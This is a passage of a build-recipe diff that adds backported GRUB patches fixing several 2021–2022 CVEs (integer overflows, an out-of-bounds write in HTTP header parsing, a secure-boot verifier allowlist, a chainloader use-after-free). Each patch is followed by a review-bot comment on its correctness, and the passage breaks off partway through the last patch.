+We did not check if vb * width >= hb * nc1.
+
+On a 64-bit platform, if that turns out to be negative, it will underflow,
+be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
+we see data->bitmap_ptr jump, e.g.:
+
+0x6180_0000_0480 to
+0x6181_0000_0498
+ ^
+ ~--- carry has occurred and this pointer is now far away from
+ any object.
+
+On a 32-bit platform, it will decrement the pointer, creating a pointer
+that won't crash but will overwrite random data.
+
+Catch the underflow and error out.
+
+Fixes: CVE-2021-3697
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/jpeg.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..545a60b 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -23,6 +23,7 @@
+ #include <grub/mm.h>
+ #include <grub/misc.h>
+ #include <grub/bufio.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -617,6 +618,7 @@ static grub_err_t
+ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ {
+ unsigned c1, vb, hb, nr1, nc1;
++ unsigned stride_a, stride_b, stride;
+ int rst = data->dri;
+
+ vb = 8 << data->log_vs;
+@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
+ nc1 = (data->image_width + hb - 1) >> (3 + data->log_hs);
+
++ if (grub_mul(vb, data->image_width, &stride_a) ||
++ grub_mul(hb, nc1, &stride_b) ||
++ grub_sub(stride_a, stride_b, &stride))
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "jpeg: cannot decode image with these dimensions");
++
+ for (; data->r1 < nr1 && (!data->dri || rst);
+- data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
++ data->r1++, data->bitmap_ptr += stride * 3)
+ for (c1 = 0; c1 < nc1 && (!data->dri || rst);
+ c1++, rst--, data->bitmap_ptr += hb * 3)
+ {
+--
+2.25.1
+
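Review bot: The loop increment `data->bitmap_ptr += stride * 3` in grub_jpeg_decode_data still multiplies unchecked, even though the two products and the difference feeding `stride` were moved to `grub_mul`/`grub_sub`. Whether `image_width` is bounded tightly enough for `stride * 3` to fit in `unsigned` is not visible in this hunk. Folding it into the same chain, `|| grub_mul (stride, 3, &stride)`, and then adding plain `stride` in the loop would make the bound explicit. As a style point, `grub_mul(vb,`, `grub_mul(hb,` and `grub_sub(stride_a,` omit the space before the parenthesis that the surrounding code uses (`grub_error (`).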
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3981.patch b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
new file mode 100644
index 0000000000..e27027ea65
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
+From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 27 Jun 2022 10:15:29 +0530
+Subject: [PATCH] CVE-2021-3981
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
+CVE: CVE-2021-3981
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ util/grub-mkconfig.in | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
+index 9f477ff..ead94a6 100644
+--- a/util/grub-mkconfig.in
++++ b/util/grub-mkconfig.in
+@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
+ exit 1
+ else
+ # none of the children aborted with error, install the new grub.cfg
+- mv -f ${grub_cfg}.new ${grub_cfg}
++ oldumask=$(umask)
++ umask 077
++ cat ${grub_cfg}.new > ${grub_cfg}
++ umask $oldumask
++ rm -f ${grub_cfg}.new
+ fi
+ fi
+
+--
+2.25.1
+
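Review bot: The replacement sequence runs `rm -f ${grub_cfg}.new` whether or not `cat ${grub_cfg}.new > ${grub_cfg}` succeeded. The redirection truncates the live grub.cfg before any data is written, so a failed or interrupted write leaves a partial configuration with the only good copy deleted. That holds unless the script aborts on error, which this hunk does not show. I would make the removal conditional, `if cat ${grub_cfg}.new > ${grub_cfg}; then rm -f ${grub_cfg}.new; fi`, with the umask restored on both paths. The patch header gives no rationale either, so a comment such as `# cat keeps the mode of an existing grub.cfg; umask 077 covers a newly created one` would record why `mv -f` was dropped.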
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-2601.patch b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
new file mode 100644
index 0000000000..090f693be3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
+From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 01:58:27 +0800
+Subject: [PATCH] font: Fix several integer overflows in
+ grub_font_construct_glyph()
+
+This patch fixes several integer overflows in grub_font_construct_glyph().
+Glyphs of invalid size, zero or leading to an overflow, are rejected.
+The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
+returns NULL is fixed too.
+
+Fixes: CVE-2022-2601
+
+Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
+CVE: CVE-2022-2601
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index df17dba..f110db9 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ struct grub_video_signed_rect bounds;
+ static struct grub_font_glyph *glyph = 0;
+ static grub_size_t max_glyph_size = 0;
++ grub_size_t cur_glyph_size;
+
+ ensure_comb_space (glyph_id);
+
+@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ if (!glyph_id->ncomb && !glyph_id->attributes)
+ return main_glyph;
+
+- if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
++ if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
++ grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
++ return main_glyph;
++
++ if (max_glyph_size < cur_glyph_size)
+ {
+ grub_free (glyph);
+- max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
+- if (max_glyph_size < 8)
+- max_glyph_size = 8;
+- glyph = grub_malloc (max_glyph_size);
++ if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
++ max_glyph_size = 0;
++ glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
+ }
+ if (!glyph)
+ {
++ max_glyph_size = 0;
+ grub_errno = GRUB_ERR_NONE;
+ return main_glyph;
+ }
+
+- grub_memset (glyph, 0, sizeof (*glyph)
+- + (bounds.width * bounds.height
+- + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
++ grub_memset (glyph, 0, cur_glyph_size);
+
+ glyph->font = main_glyph->font;
+- glyph->width = bounds.width;
+- glyph->height = bounds.height;
+- glyph->offset_x = bounds.x;
+- glyph->offset_y = bounds.y;
++ if (bounds.width == 0 || bounds.height == 0 ||
++ grub_cast (bounds.width, &glyph->width) ||
++ grub_cast (bounds.height, &glyph->height) ||
++ grub_cast (bounds.x, &glyph->offset_x) ||
++ grub_cast (bounds.y, &glyph->offset_y))
++ return main_glyph;
+
+ if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
+ grub_font_blit_glyph_mirror (glyph, main_glyph,
+--
+2.25.1
+
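Review bot: The rewritten size computation in grub_font_construct_glyph calls `grub_video_bitmap_calc_1bpp_bufsz`, `grub_add`, `grub_mul` and `grub_cast`, but this patch touches only font.c and adds neither an include nor a definition for them. If the target tree does not already provide them from an earlier patch, the backport will not build, so the prerequisite should be named in the patch header and its position in the recipe's patch list confirmed. Separately, the `bounds.width == 0 || bounds.height == 0` rejection runs only after the buffer has been reallocated and cleared. Testing it next to the size calculation would return `main_glyph` before the static buffer is touched. The function begins and ends outside the hunk.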
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28733.patch b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
new file mode 100644
index 0000000000..6cfdf20e2d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
+From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:48:34 +0530
+Subject: [PATCH] CVE-2022-28733
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
+CVE: CVE-2022-28733
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/ip: Do IP fragment maths safely
+
+We can receive packets with invalid IP fragmentation information. This
+can lead to rsm->total_len underflowing and becoming very large.
+
+Then, in grub_netbuff_alloc(), we add to this very large number, which can
+cause it to overflow and wrap back around to a small positive number.
+The allocation then succeeds, but the resulting buffer is too small and
+subsequent operations can write past the end of the buffer.
+
+Catch the underflow here.
+
+Fixes: CVE-2022-28733
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/net/ip.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
+index ea5edf8..74e4e8b 100644
+--- a/grub-core/net/ip.c
++++ b/grub-core/net/ip.c
+@@ -25,6 +25,7 @@
+ #include <grub/net/netbuff.h>
+ #include <grub/mm.h>
+ #include <grub/priority_queue.h>
++#include <grub/safemath.h>
+ #include <grub/time.h>
+
+ struct iphdr {
+@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
+ {
+ rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
+ + (nb->tail - nb->data));
+- rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
++
++ if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
++ &rsm->total_len))
++ {
++ grub_dprintf ("net", "IP reassembly size underflow\n");
++ return GRUB_ERR_NONE;
++ }
++
+ rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
+ if (!rsm->asm_netbuff)
+ {
+--
+2.25.1
+
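Review bot: The new underflow branch in grub_net_recv_ip4_packets returns `GRUB_ERR_NONE` straight after the `grub_dprintf`, with no cleanup visible. `grub_sub` is also given `&rsm->total_len` as its output, so if it stores the wrapped result the way the compiler overflow builtins do, the reassembly entry keeps a bogus length. Whether `nb` must be freed on this path and whether `rsm` should be dropped from the reassembly list depends on code outside the hunk. It is worth confirming against the other early returns in this function. Computing into a local first and assigning `rsm->total_len` only on success would at least keep the stored length valid.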
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28734.patch b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
new file mode 100644
index 0000000000..577ec10bea
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
+From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:59:41 +0530
+Subject: [PATCH] CVE-2022-28734
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
+CVE: CVE-2022-28734
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http: Fix OOB write for split http headers
+
+GRUB has special code for handling an http header that is split
+across two packets.
+
+The code tracks the end of line by looking for a "\n" byte. The
+code for split headers has always advanced the pointer just past the
+end of the line, whereas the code that handles unsplit headers does
+not advance the pointer. This extra advance causes the length to be
+one greater, which breaks an assumption in parse_line(), leading to
+it writing a NUL byte one byte past the end of the buffer where we
+reconstruct the line from the two packets.
+
+It's conceivable that an attacker controlled set of packets could
+cause this to zero out the first byte of the "next" pointer of the
+grub_mm_region structure following the current_line buffer.
+
+Do not advance the pointer in the split header case.
+
+Fixes: CVE-2022-28734
+---
+ grub-core/net/http.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/net/http.c b/grub-core/net/http.c
+index 5aa4ad3..a220d21 100644
+--- a/grub-core/net/http.c
++++ b/grub-core/net/http.c
+@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
+ char *end = ptr + len;
+ while (end > ptr && *(end - 1) == '\r')
+ end--;
++
++ /* LF without CR. */
++ if (end == ptr + len)
++ {
++ data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
++ return GRUB_ERR_NONE;
++ }
+ *end = 0;
++
+ /* Trailing CRLF. */
+ if (data->in_chunk_len == 1)
+ {
+@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
+ int have_line = 1;
+ char *t;
+ ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
+- if (ptr)
+- ptr++;
+- else
++ if (ptr == NULL)
+ {
+ have_line = 0;
+ ptr = (char *) nb->tail;
+--
+2.25.1
+
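Review bot: In the new "LF without CR" branch of parse_line, the result of `grub_strdup` is stored in `data->errmsg` unchecked and the function then returns `GRUB_ERR_NONE`. If the allocation fails, `errmsg` stays NULL and the malformed header is indistinguishable from a successfully parsed line, assuming callers detect the condition through `errmsg`, which is not visible here. Returning `grub_errno` when `data->errmsg` is NULL would close that gap. The branch also relies on http_receive no longer advancing `ptr` past the `\n`, so a short comment on `if (end == ptr + len)` saying that `len` excludes the LF would help.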
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28735.patch b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
new file mode 100644
index 0000000000..89b653a8da
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
+From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Thu, 2 Dec 2021 15:03:53 +0100
+Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
+CVE: CVE-2022-28735
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+We must not allow other verifiers to pass things like the GRUB modules.
+Instead of maintaining a blocklist, maintain an allowlist of things
+that we do not care about.
+
+This allowlist really should be made reusable, and shared by the
+lockdown verifier, but this is the minimal patch addressing
+security concerns where the TPM verifier was able to mark modules
+as verified (or the OpenPGP verifier for that matter), when it
+should not do so on shim-powered secure boot systems.
+
+Fixes: CVE-2022-28735
+
+Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
+ include/grub/verify.h | 1 +
+ 2 files changed, 222 insertions(+)
+ create mode 100644 grub-core/kern/efi/sb.c
+
+diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
+new file mode 100644
+index 0000000..89c4bb3
+--- /dev/null
++++ b/grub-core/kern/efi/sb.c
+@@ -0,0 +1,221 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ * UEFI Secure Boot related checkings.
++ */
++
++#include <grub/efi/efi.h>
++#include <grub/efi/pe32.h>
++#include <grub/efi/sb.h>
++#include <grub/env.h>
++#include <grub/err.h>
++#include <grub/file.h>
++#include <grub/i386/linux.h>
++#include <grub/kernel.h>
++#include <grub/mm.h>
++#include <grub/types.h>
++#include <grub/verify.h>
++
++static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
++
++/*
++ * Determine whether we're in secure boot mode.
++ *
++ * Please keep the logic in sync with the Linux kernel,
++ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
++ */
++grub_uint8_t
++grub_efi_get_secureboot (void)
++{
++ static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_efi_status_t status;
++ grub_efi_uint32_t attr = 0;
++ grub_size_t size = 0;
++ grub_uint8_t *secboot = NULL;
++ grub_uint8_t *setupmode = NULL;
++ grub_uint8_t *moksbstate = NULL;
++ grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
++ const char *secureboot_str = "UNKNOWN";
++
++ status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
++ &size, (void **) &secboot);
++
++ if (status == GRUB_EFI_NOT_FOUND)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
++ &size, (void **) &setupmode);
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ if ((*secboot == 0) || (*setupmode == 1))
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ /*
++ * See if a user has put the shim into insecure mode. If so, and if the
++ * variable doesn't have the runtime attribute set, we might as well
++ * honor that.
++ */
++ status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
++ &size, (void **) &moksbstate, &attr);
++
++ /* If it fails, we don't care why. Default to secure. */
++ if (status != GRUB_EFI_SUCCESS)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++ goto out;
++ }
++
++ if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++
++ out:
++ grub_free (moksbstate);
++ grub_free (setupmode);
++ grub_free (secboot);
++
++ if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
++ secureboot_str = "Disabled";
++ else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ secureboot_str = "Enabled";
++
++ grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
++
++ return secureboot;
++}
++
++static grub_err_t
++shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_NONE;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ /* Files we check. */
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
++ return GRUB_ERR_NONE;
++
++ /* Files that do not affect secureboot state. */
++ case GRUB_FILE_TYPE_NONE:
++ case GRUB_FILE_TYPE_LOOPBACK:
++ case GRUB_FILE_TYPE_LINUX_INITRD:
++ case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
++ case GRUB_FILE_TYPE_XNU_RAMDISK:
++ case GRUB_FILE_TYPE_SIGNATURE:
++ case GRUB_FILE_TYPE_PUBLIC_KEY:
++ case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
++ case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
++ case GRUB_FILE_TYPE_TESTLOAD:
++ case GRUB_FILE_TYPE_GET_SIZE:
++ case GRUB_FILE_TYPE_FONT:
++ case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
++ case GRUB_FILE_TYPE_CAT:
++ case GRUB_FILE_TYPE_HEXCAT:
++ case GRUB_FILE_TYPE_CMP:
++ case GRUB_FILE_TYPE_HASHLIST:
++ case GRUB_FILE_TYPE_TO_HASH:
++ case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
++ case GRUB_FILE_TYPE_PIXMAP:
++ case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
++ case GRUB_FILE_TYPE_CONFIG:
++ case GRUB_FILE_TYPE_THEME:
++ case GRUB_FILE_TYPE_GETTEXT_CATALOG:
++ case GRUB_FILE_TYPE_FS_SEARCH:
++ case GRUB_FILE_TYPE_LOADENV:
++ case GRUB_FILE_TYPE_SAVEENV:
++ case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++ return GRUB_ERR_NONE;
++
++ /* Other files. */
++ default:
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
++ }
++}
++
++static grub_err_t
++shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
++{
++ grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ if (!sl)
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
++
++ if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
++ return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
++
++ return GRUB_ERR_NONE;
++}
++
++struct grub_file_verifier shim_lock_verifier =
++ {
++ .name = "shim_lock_verifier",
++ .init = shim_lock_verifier_init,
++ .write = shim_lock_verifier_write
++ };
++
++void
++grub_shim_lock_verifier_setup (void)
++{
++ struct grub_module_header *header;
++ grub_efi_shim_lock_protocol_t *sl =
++ grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
++ if (!sl)
++ {
++ FOR_MODULES (header)
++ {
++ if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
++ return;
++ }
++ }
++
++ /* Secure Boot is off. Do not load shim_lock. */
++ if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ return;
++
++ /* Enforce shim_lock_verifier. */
++ grub_verifier_register (&shim_lock_verifier);
++
++ grub_env_set ("shim_lock", "y");
++ grub_env_export ("shim_lock");
++}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index cd129c3..672ae16 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -24,6 +24,7 @@
+
+ enum grub_verify_flags
+ {
++ GRUB_VERIFY_FLAGS_NONE = 0,
+ GRUB_VERIFY_FLAGS_SKIP_VERIFICATION = 1,
+ GRUB_VERIFY_FLAGS_SINGLE_CHUNK = 2,
+ /* Defer verification to another authority. */
+--
+2.25.1
+
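Review bot: grub-core/kern/efi/sb.c is added here as a complete new file, but nothing in this patch puts it on a build list or supplies what it depends on: `<grub/efi/sb.h>`, `grub_efi_get_variable_with_attributes`, `OBJ_TYPE_DISABLE_SHIM_LOCK` and a caller for `grub_shim_lock_verifier_setup`. If the target tree does not already carry these from an earlier patch, the file either fails to compile or is never linked. In that case the allowlist in shim_lock_verifier_init, including its `default:` deny branch, would not be in effect despite the CVE being marked as patched. I would state the prerequisite patches in the header and confirm from a build that `shim_lock_verifier` is actually registered. In grub_efi_get_secureboot, `*secboot`, `*setupmode` and `*moksbstate` are dereferenced without checking the returned `size`, so a note or check that each variable is at least one byte long would be worthwhile.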
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28736.patch b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
new file mode 100644
index 0000000000..4fc9fdaf05
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
+From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 11:17:17 +0530
+Subject: [PATCH] CVE-2022-28736
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
+CVE: CVE-2022-28736
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+loader/efi/chainloader: Use grub_loader_set_ex()
+
+This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
+a use-after-free bug that occurs when grub_cmd_chainloader() is executed
+more than once before a boot attempt is performed.
+
+Fixes: CVE-2022-28736
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/commands/boot.c | 66 ++++++++++++++++++++++++++----
+ grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
+ include/grub/loader.h | 5 +++
+ 3 files changed, 87 insertions(+), 30 deletions(-)
+
+diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
+index bbca81e..6151478 100644
+--- a/grub-core/commands/boot.c
++++ b/grub-core/commands/boot.c
+@@ -27,10 +27,20 @@
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+-static grub_err_t (*grub_loader_boot_func) (void);
+-static grub_err_t (*grub_loader_unload_func) (void);
++static grub_err_t (*grub_loader_boot_func) (void *context);
++static grub_err_t (*grub_loader_unload_func) (void *context);
++static void *grub_loader_context;
+ static int grub_loader_flags;
+
++struct grub_simple_loader_hooks
++{
++ grub_err_t (*boot) (void);
++ grub_err_t (*unload) (void);
++};
++
++/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
++static struct grub_simple_loader_hooks simple_loader_hooks;
++
+ struct grub_preboot
+ {
+ grub_err_t (*preboot_func) (int);
+@@ -44,6 +54,29 @@ static int grub_loader_loaded;
+ static struct grub_preboot *preboots_head = 0,
+ *preboots_tail = 0;
+
++static grub_err_t
++grub_simple_boot_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++ return hooks->boot ();
++}
++
++static grub_err_t
++grub_simple_unload_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++ grub_err_t ret;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++
++ ret = hooks->unload ();
++ grub_memset (hooks, 0, sizeof (*hooks));
++
++ return ret;
++}
++
+ int
+ grub_loader_is_loaded (void)
+ {
+@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
+ }
+
+ void
+-grub_loader_set (grub_err_t (*boot) (void),
+- grub_err_t (*unload) (void),
+- int flags)
++grub_loader_set_ex (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = boot;
+ grub_loader_unload_func = unload;
++ grub_loader_context = context;
+ grub_loader_flags = flags;
+
+ grub_loader_loaded = 1;
+ }
+
++void
++grub_loader_set (grub_err_t (*boot) (void),
++ grub_err_t (*unload) (void),
++ int flags)
++{
++ grub_loader_set_ex (grub_simple_boot_hook,
++ grub_simple_unload_hook,
++ &simple_loader_hooks,
++ flags);
++
++ simple_loader_hooks.boot = boot;
++ simple_loader_hooks.unload = unload;
++}
++
+ void
+ grub_loader_unset(void)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = 0;
+ grub_loader_unload_func = 0;
++ grub_loader_context = 0;
+
+ grub_loader_loaded = 0;
+ }
+@@ -158,7 +208,7 @@ grub_loader_boot (void)
+ return err;
+ }
+ }
+- err = (grub_loader_boot_func) ();
++ err = (grub_loader_boot_func) (grub_loader_context);
+
